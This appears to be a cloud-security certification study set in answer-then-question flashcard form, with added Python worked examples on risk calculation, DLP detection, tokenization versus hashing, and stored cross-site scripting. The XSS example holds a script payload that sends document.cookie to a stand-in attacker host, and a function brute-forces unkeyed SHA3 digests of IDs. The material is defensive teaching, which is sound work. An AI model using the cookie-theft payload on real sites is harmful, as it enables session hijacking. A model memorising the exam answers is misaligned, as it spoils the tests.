Tier 3
You are selecting a datacenter environment to host a cloud application run by your organization. Your primary requirement is that the datacenter must require no shutdowns for equipment maintenance. What is the lowest level of datacenter that would be acceptable under the Uptime Institute tier system?
The cloud customer
In an infrastructure as a service (IaaS) arrangement, who accepts responsibility for securing cloud‐based applications?
Software composition analysis (SCA)
Brenda’s company employs a number of application developers who create software to meet many different business needs. She is embarking on a project to validate the use of verified open source software and is concerned about the unknowing use of software libraries by those developers. Which of the following technologies will best assist with identifying these uses?
Network intrusion detection systems (NIDS)
________ are software or devices that monitor networks for malicious activities or policy violations and produce electronic alerts and/or reports to a management station.
Only employees of Carla’s company with the appropriate security training and access rights.
Carla works for an infrastructure as a service (IaaS) provider. She is analyzing the security settings for the hypervisors used in a multitenant environment. Who should have access to modify settings on those hypervisors?
Public cloud
In which cloud computing model does a customer share computing infrastructure with other customers of the cloud vendor where one customer may not know the other’s identity?
Federation
You work for a government research facility. Your organization often shares data with other government research organizations. You would like to create a single sign‐on experience across the organizations, where users at each organization can sign in with the user ID/authentication issued by that organization, then access research data in all the other organizations. Instead of replicating the data stores of each organization at every other organization (which is one way of accomplishing this goal), you instead want every user to have access to each organization’s specific storage resources.
What is the term for this kind of arrangement?
Data loss prevention (DLP) systems
Paul’s organization maintains protected health information that is regulated under HIPAA. He would like to add a new security control capable of detecting when employees attempt to remove this sensitive information from his organization’s systems and networks, either intentionally or unintentionally. What security control would best meet his needs?
Off‐site storage
Which of the following is not an essential element defining cloud computing?
Tabletop exercise
Justin recently participated in a disaster recovery plan test where the team sat together and discussed the response to a scenario but did not actually activate any disaster recovery controls. What type of test did he participate in?
ISO 27017
Tonya is employed by a cloud service provider and is responsible for evaluating the provider’s security program. What ISO standard can best help her ensure that her organization has a robust set of security controls in place?
The data is safe only if the tokenization mapping (the token vault that links each token back to the real student ID) was also kept secure and was not part of the exposure.
Katie’s organization recently suffered a data breach and exposed a database containing student records. The records contained no identifying information other than tokenized student ID numbers. Which of the following statements most accurately represents how Katie should feel about the exposure of these records?
Purchase uninterruptible power supplies (UPSs) from different vendors.
Bob is designing a datacenter to support his organization, a financial services firm. Which of the following actions would best enhance Bob’s efforts to create resiliency in the datacenter?
EAL4
Under the Common Criteria, which one of the following EAL levels indicates that a system has been methodically designed, tested, and reviewed?
Honeypot
A(n) ______________ consists of a computer, data, or a network site that appears to be part of a network but is actually isolated and monitored. It also appears to contain data or resources of value that are in fact fake.
Transport layer security (TLS)
Rusty is evaluating the security of a web‐based SaaS application and wants to verify that the site provides strong encryption between the web server and the client. What is the most common way to achieve this goal?
SOC 2
You operate a cloud service and would like a report that confirms the effectiveness of your security controls and provides significant detail of control gaps that you can use for remediation. What type of audit should you conduct?
Customers, Regulators, Partners
Adam’s organization recently experienced a security breach that affected customer data. Which one of the following stakeholder groups might Adam be required to inform?
Content filtering
An application programming interface (API) gateway can typically offer all of the following capabilities except _________________.
GPS
When logging information about an internet user’s location, what source provides the most accurate physical location data?
Hardware security module
What type of device is designed to safely store and manage encryption keys?
The client
The Transport Layer Security (TLS) protocol creates a secure communications channel over public media (such as the internet). In a typical TLS session, who initiates the protocol?
IaaS
In what cloud computing service model is the customer responsible for installing and maintaining the operating system?
37.5 percent
Please refer to the following scenario:
Darcy is an information security risk analyst for Roscommon Cloud Solutions. She is currently trying to decide whether the company should purchase an upgraded fire suppression system for their primary datacenter. The datacenter facility has a replacement cost of $2 million.
After consulting with actuaries, datacenter managers, and fire subject matter experts, Darcy determined that a typical fire would likely require the replacement of all equipment inside the building but not cause significant structural damage. Together, they estimated that recovering from the fire would cost $750,000. They also determined that the company can expect a fire of this magnitude once every 50 years.
Based on the information in this scenario, what is the exposure factor for the effect of a fire on the Roscommon Cloud Solutions datacenter?
0.02
Please refer to the following scenario:
Darcy is an information security risk analyst for Roscommon Cloud Solutions. She is currently trying to decide whether the company should purchase an upgraded fire suppression system for their primary datacenter. The datacenter facility has a replacement cost of $2 million.
After consulting with actuaries, datacenter managers, and fire subject matter experts, Darcy determined that a typical fire would likely require the replacement of all equipment inside the building but not cause significant structural damage. Together, they estimated that recovering from the fire would cost $750,000. They also determined that the company can expect a fire of this magnitude once every 50 years.
Based on the information in this scenario, what is the annualized rate of occurrence for a fire at the Roscommon Cloud Solutions datacenter?
15,000
Please refer to the following scenario:
Darcy is an information security risk analyst for Roscommon Cloud Solutions. She is currently trying to decide whether the company should purchase an upgraded fire suppression system for their primary datacenter. The datacenter facility has a replacement cost of $2 million.
After consulting with actuaries, datacenter managers, and fire subject matter experts, Darcy determined that a typical fire would likely require the replacement of all equipment inside the building but not cause significant structural damage. Together, they estimated that recovering from the fire would cost $750,000. They also determined that the company can expect a fire of this magnitude once every 50 years.
Based on the information in this scenario, what is the annualized loss expectancy for a fire at the Roscommon Cloud Solutions datacenter?
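The three Roscommon questions above are one chain of quantitative risk arithmetic. The following is an added worked example (not part of the question set) that carries the chain through in code and then applies the same figures to the decision Darcy actually has to make: whether the upgraded suppression system is worth buying. The EF, ARO and ALE formulas are the standard ones the questions rely on; the upgrade's effect (halving the loss from a fire) and its $5,000 annual cost are assumptions introduced only for illustration.

```python
"""Quantitative risk figures for the Roscommon datacenter scenario.

Added worked example, not from the original question set.  Formulas:

    EF  = single loss / asset value        (exposure factor)
    ARO = 1 / years between events         (annualized rate of occurrence)
    SLE = asset value * EF = single loss   (single loss expectancy)
    ALE = SLE * ARO                        (annualized loss expectancy)
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class RiskFigures:
    asset_value: float   # replacement cost of the asset, in dollars
    sle: float           # single loss expectancy, in dollars
    ef: float            # exposure factor, 0.0 .. 1.0
    aro: float           # expected occurrences per year
    ale: float           # annualized loss expectancy, in dollars


def quantify_risk(asset_value: float, single_loss: float,
                  years_between_events: float) -> RiskFigures:
    """Derive EF, ARO and ALE from an asset value, the cost of one event
    and the expected interval between events."""
    if asset_value <= 0 or single_loss < 0 or years_between_events <= 0:
        raise ValueError("asset value, loss and interval must be positive")
    ef = single_loss / asset_value
    if ef > 1.0:
        raise ValueError("a single loss cannot exceed the asset value")
    aro = 1.0 / years_between_events
    ale = single_loss * aro
    return RiskFigures(asset_value, single_loss, ef, aro, ale)


def safeguard_value(ale_before: float, ale_after: float,
                    annual_cost_of_safeguard: float) -> float:
    """Net annual value of a control: the ALE it removes minus what it costs
    per year.  A positive result means the safeguard is cost-justified."""
    return (ale_before - ale_after) - annual_cost_of_safeguard


# Figures stated in the scenario.
fire = quantify_risk(asset_value=2_000_000, single_loss=750_000,
                     years_between_events=50)

# Assumption for illustration (not in the scenario): the upgraded suppression
# system halves the loss from a fire and costs $5,000 per year to own.
fire_with_upgrade = quantify_risk(asset_value=2_000_000, single_loss=375_000,
                                  years_between_events=50)
UPGRADE_NET_VALUE = safeguard_value(fire.ale, fire_with_upgrade.ale, 5_000)

if __name__ == "__main__":
    print(f"EF  = {fire.ef:.3f} ({fire.ef:.1%})")
    print(f"ARO = {fire.aro:.2f}")
    print(f"ALE = ${fire.ale:,.0f}")
    print(f"Net annual value of the upgrade: ${UPGRADE_NET_VALUE:,.0f}")
```

Running it prints EF = 0.375 (37.5%), ARO = 0.02 and ALE = $15,000, matching the three answers above; under the assumed upgrade figures the control removes $7,500 of ALE for $5,000 a year, so it nets $2,500 and is worth buying. Change the assumed cost or effectiveness and the same function tells you when it stops being justified.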
Coordinating multiple providers that might have relevant records
What is the most significant barrier to eDiscovery efforts in organizations that make heavy use of many different cloud services?
Encryption
David’s organization is preparing to adopt an information rights management tool. What IRM capability focuses on securing data sent by the system while it is in transit over a network?
Identifying the specific points at which a system could be attacked and then implementing countermeasures to protect those points from successful exploitation
Which of the following best describes threat modeling?
Fires in power supplies
Gary is concerned that the environmental controls in his organization’s datacenter may not be effectively controlling humidity. Which of the following circumstances would not commonly result from humidity issues?
Tokenization
Which of the following mechanisms cannot be used by a data loss prevention (DLP) solution to detect the presence of data?
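To make the distinction in the DLP questions above concrete, here is an added example (not part of the question set) that runs the three detection mechanisms a DLP engine actually uses, pattern matching, keyword matching and exact data matching on fingerprints, over a few constructed outbound messages. Tokenization does not appear in it because it is a transform applied to protect data, not a way of recognising data in transit. The sample lines, the keyword list and the fingerprinted values are assumptions for illustration.

```python
"""Detection mechanisms a data loss prevention (DLP) engine uses, run over
constructed lines of outbound text.  Added example, not from the question set."""
import hashlib
import re
from typing import Dict, List

# 1. Pattern matching: a US SSN with separators, rejecting groups that cannot
#    be issued (000, 666, 9xx area; 00 group; 0000 serial).
SSN_RE = re.compile(r"\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")

# 2. Keyword / dictionary matching (case-insensitive).  Constructed list.
KEYWORDS = ("confidential", "protected health information", "diagnosis")


# 3. Exact data matching (EDM): the enforcement point holds only hashes of
#    the known sensitive values, so the values themselves are never copied
#    onto it.  Normalising before hashing keeps minor reformatting from
#    defeating the match.
def fingerprint(value: str) -> str:
    normalized = re.sub(r"\s+", " ", value.strip().lower())
    return hashlib.sha256(normalized.encode()).hexdigest()


# Constructed "known sensitive values", e.g. exported from a records system.
FINGERPRINTS = {fingerprint(v) for v in ("Patient MRN 44-9012", "Acct 0099-7781")}


def scan_line(line: str, max_window: int = 4) -> List[str]:
    """Return the detection labels that fire on one line, in mechanism order."""
    hits: List[str] = []
    if SSN_RE.search(line):
        hits.append("pattern:ssn")
    lowered = line.lower()
    hits.extend(f"keyword:{kw}" for kw in KEYWORDS if kw in lowered)
    tokens = line.split()
    # Slide windows of 2..max_window tokens over the line and fingerprint each.
    if any(fingerprint(" ".join(tokens[i:i + n])) in FINGERPRINTS
           for n in range(2, max_window + 1)
           for i in range(len(tokens) - n + 1)):
        hits.append("edm:fingerprint")
    return hits


def scan_all(lines: List[str]) -> Dict[str, List[str]]:
    return {line: scan_line(line) for line in lines}


SAMPLE_LINES = [  # constructed outbound messages
    "Sending the Q3 marketing deck to the print shop",
    "Per our call, the Confidential diagnosis for patient MRN 44-9012 is attached",
    "Employee SSN 123-45-6789 is needed for the benefits form",
    "Ticket 123-45-67890 is a tracking number, not an SSN",
]

if __name__ == "__main__":
    for text, labels in scan_all(SAMPLE_LINES).items():
        print(f"{labels or ['clean']!s:<55} {text}")
```

The fourth line is there to show why the word-boundary anchors in the pattern matter: an eleven-digit tracking number that happens to start with an SSN-shaped prefix should not fire, and with `\b` at both ends it does not. In a real deployment the fingerprint set is generated from the authoritative data store on a schedule, and the keyword list is the weakest of the three (it is the one most prone to the false positives described in the later SIEM/DLP tuning question).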
Hashing
Gabriel’s organization maintains a system of voting records. The system uses SHA3 to obscure the contents of sensitive records. What data obfuscation technique is this system using?
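The Katie tokenization question and the Gabriel SHA3 question above are two sides of the same point: a breached table of tokens is safe as long as the vault stays private, whereas a breached table of unkeyed hashes of low-entropy identifiers is not, because anyone can hash every possible ID and compare. The following added example (not part of the question set) shows both behaviours and the keyed-hash fix. The ID format ("S" followed by five digits, so 100,000 possible IDs), the sample record and the vault implementation are assumptions for illustration.

```python
"""Vaulted tokenization versus hashing as data-obfuscation techniques.
Added example, not from the question set."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

ID_PREFIX = "S"      # assumed record-ID format: "S" + 5 digits
ID_DIGITS = 5        # i.e. a search space of only 100,000 values


class TokenVault:
    """Vaulted tokenization: each token is random and carries no information
    about the value; only the vault mapping can reverse it."""

    def __init__(self) -> None:
        self._to_token: Dict[str, str] = {}
        self._to_value: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        if value not in self._to_token:
            token = secrets.token_hex(8)
            while token in self._to_value:      # collision is practically impossible
                token = secrets.token_hex(8)
            self._to_token[value] = token
            self._to_value[token] = value
        return self._to_token[value]

    def detokenize(self, token: str) -> Optional[str]:
        return self._to_value.get(token)


def sha3_obscure(value: str) -> str:
    """Unkeyed SHA3-256: deterministic and public, so anyone can test guesses."""
    return hashlib.sha3_256(value.encode()).hexdigest()


def hmac_sha3_obscure(key: bytes, value: str) -> str:
    """Keyed variant: without the key an attacker cannot check candidates."""
    return hmac.new(key, value.encode(), hashlib.sha3_256).hexdigest()


def brute_force(digest: str) -> Optional[str]:
    """Enumerate the whole ID space against a digest, as an attacker holding
    the breached table would.  Recovers unkeyed SHA3 outputs in milliseconds."""
    for n in range(10 ** ID_DIGITS):
        candidate = f"{ID_PREFIX}{n:0{ID_DIGITS}d}"
        if sha3_obscure(candidate) == digest:
            return candidate
    return None


def demo() -> dict:
    vault = TokenVault()
    record_id = "S04217"                       # constructed student ID
    token = vault.tokenize(record_id)
    key = secrets.token_bytes(32)              # lives in an HSM/KMS, not with the data
    return {
        "token_reversible_with_vault": vault.detokenize(token) == record_id,
        "token_reversible_without_vault": TokenVault().detokenize(token),
        "sha3_recovered": brute_force(sha3_obscure(record_id)),
        "hmac_recovered": brute_force(hmac_sha3_obscure(key, record_id)),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:<32} {outcome}")
```

The unkeyed SHA3 digest of the record ID is recovered by exhaustion; the HMAC digest under a key the attacker does not hold is not, and a token held without the vault reverses to nothing at all. The lesson for Gabriel's voting-records system is that "obscured with SHA3" is only as strong as the entropy of the input, which is why identifiers should be hashed with a secret key (or tokenized) rather than hashed bare.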
SOC 3
Which Statement on Standards for Attestation Engagements (SSAE) 18 report is purposefully designed for public release (for instance, to be posted on a company’s website)?
It must be on a distinct, isolated management network (virtual local area network [VLAN]).
Which of the following is a true statement about the virtualization management toolset?
PaaS
You are the IT director for a small contracting firm. Your company is considering migrating to a cloud production environment. Which service model would best fit your needs if you wanted an option that reduced the chance of vendor lock‐in but also did not require the highest degree of administration by your own personnel?
Rapid elasticity
You are the data manager for a retail company; you anticipate a much higher volume of sales activity in the final quarter of each calendar year than the other quarters. In order to handle these increased transactions, and to accommodate the temporary sales personnel you will hire for only that time period, you consider augmenting your internal, on‐premises production environment with a cloud capability for a specific duration, and will return to operating fully on‐premises after the period of increased activity. Which facet of cloud computing is most important for making this possible?
The data owner
Which one of the following individuals is typically responsible for making high‐level data classification decisions for an organization?
Cross‐site scripting
Brad is assisting with the implementation of a cloud‐based SaaS solution where users can post content that is viewed by other users. He is concerned that users might store executable content on the site that then might be executed automatically by the browsers of other site visitors. What type of vulnerability would permit this attack?
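The stored cross-site scripting risk Brad is worried about comes down to how the application renders user-posted content for other visitors. As an added example (not part of the question set), here is the vulnerable rendering beside its hardened form. The post template, the malicious payloads and the response-header helper are constructed for illustration; `html.escape` is the standard-library call being demonstrated.

```python
"""Stored XSS: a user-supplied post rendered into HTML for other visitors,
vulnerable and hardened versions side by side.  Added example, not from the
question set."""
import html
from typing import Dict

# Constructed malicious input of the kind Brad is concerned about.
EVIL_POST = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
EVIL_AUTHOR = '" onmouseover="alert(1)'   # breaks out of a quoted attribute


def render_unsafe(author: str, body: str) -> str:
    """Vulnerable: user input is concatenated straight into the page, so any
    markup in a post is interpreted by every viewer's browser."""
    return f'<div class="post" data-author="{author}"><p>{body}</p></div>'


def render_safe(author: str, body: str) -> str:
    """Hardened: output-encode for the HTML context at render time.
    quote=True also encodes " and ', which is what stops the attribute
    break-out in data-author; the body encoding stops the script tag."""
    return (f'<div class="post" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body, quote=True)}</p></div>')


def response_headers() -> Dict[str, str]:
    """Defence in depth for the same page: a restrictive CSP means that even
    an encoding miss cannot load or run attacker-controlled script."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_active_content(rendered: str) -> bool:
    """Crude check used only to show the difference between the two renderers:
    is there still a live script tag or an injected event-handler attribute?"""
    lowered = rendered.lower()
    return "<script" in lowered or 'onmouseover="' in lowered


if __name__ == "__main__":
    print("unsafe:", render_unsafe(EVIL_AUTHOR, EVIL_POST))
    print("safe:  ", render_safe(EVIL_AUTHOR, EVIL_POST))
```

Encoding has to match the context the data lands in: `html.escape` is right for element content and quoted attribute values, but content placed into a JavaScript block, a URL or CSS needs that context's encoding instead, and content inserted by client-side code must be assigned as text rather than HTML. The CSP header is not a substitute for encoding; it limits the blast radius when encoding is missed.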
Wait three weeks for additional data before making a final decision.
You are the security manager for an online marketing company. Your company has recently migrated to a cloud production environment and has deployed a number of new cloud‐based protection mechanisms offered by both third parties and the cloud provider, including data loss prevention (DLP) and security information and event management (SIEM) solutions.
After one week of operation, your security team reports an inordinate amount of time responding to potential incidents that have turned out to only be false‐positive reports. Management is concerned that the cloud migration was a bad idea and that it is too costly in terms of misspent security efforts. What do you recommend?
Customers
Which one of the following stakeholders is most likely to demand communication about service outages for a cloud service provider?
Logical design phase
Which is the part of the SDLC in which all functional features of the system chosen for development in analysis are described independently of any computer platform?
Health Insurance Portability and Accountability Act (HIPAA)
A group of clinics decides to create an identification federation for their users (medical providers and clinicians). In this federation, all of the participating organizations would need to be in compliance with what U.S. federal regulation?
Hybrid cloud
You are the data manager for a retail company; you anticipate a much higher volume of sales activity in the final quarter of each calendar year than the other quarters. In order to handle these increased transactions, and to accommodate the temporary sales personnel you will hire for only that time period, you consider augmenting your internal, on‐premises production environment with a cloud capability for a specific duration, and will return to operating fully on‐premises after the period of increased activity. Which deployment model best describes this type of arrangement?
Uniform resource identifiers (URIs)
How does representational state transfer (REST) make web service requests?
Information Technology Infrastructure Library (ITIL)
Which of the following best describes a set of practices that focus on aligning IT services with business needs?
Block storage
What type of cloud storage is typically used to provide disk volumes for use with virtual server instances that will store important long‐term data?
Statement of work (SOW)
Lisa is working to develop a long‐term relationship with a consulting firm that will assist in her organization’s cloud migration. She has a contract in place that governs the terms of many different projects and would like to create a document that will describe one specific new project. What type of document should she create?
Multitenancy
Full isolation of user activity, processes, and virtual network segments in a cloud environment is incredibly important because of risks due to _________________.
The relying party is the service provider; it consumes the assertions (tokens) generated by the identity provider and grants access based on them.
In a federated environment, who is the relying party, and what do they do?
Volume encryption
Christine is concerned about the risk that another customer will be able to access sensitive data elements stored in her organization’s database in a multitenant public cloud environment. What control would best mitigate this risk?
Inert gas
Which one of the following fire suppression systems is least likely to damage sensitive electronic equipment in a datacenter?
Portability
You are the security manager for a data analysis company. Your senior management is considering a cloud migration in order to use the greater capabilities of a cloud provider to perform calculations and computations. Your company wants to ensure that neither the contractual nor the technical setup of the cloud service will affect your data sets in any way so that you are not locked into a single provider.
Which of the following criteria will probably be most crucial for your choice of cloud providers?
FIPS 140‐2
Which one of the following standards is most likely to contain detailed technical requirements for a hardware security module (HSM) used in a cloud environment?
Enhanced user experience
Which of the following is not a reason for conducting audits?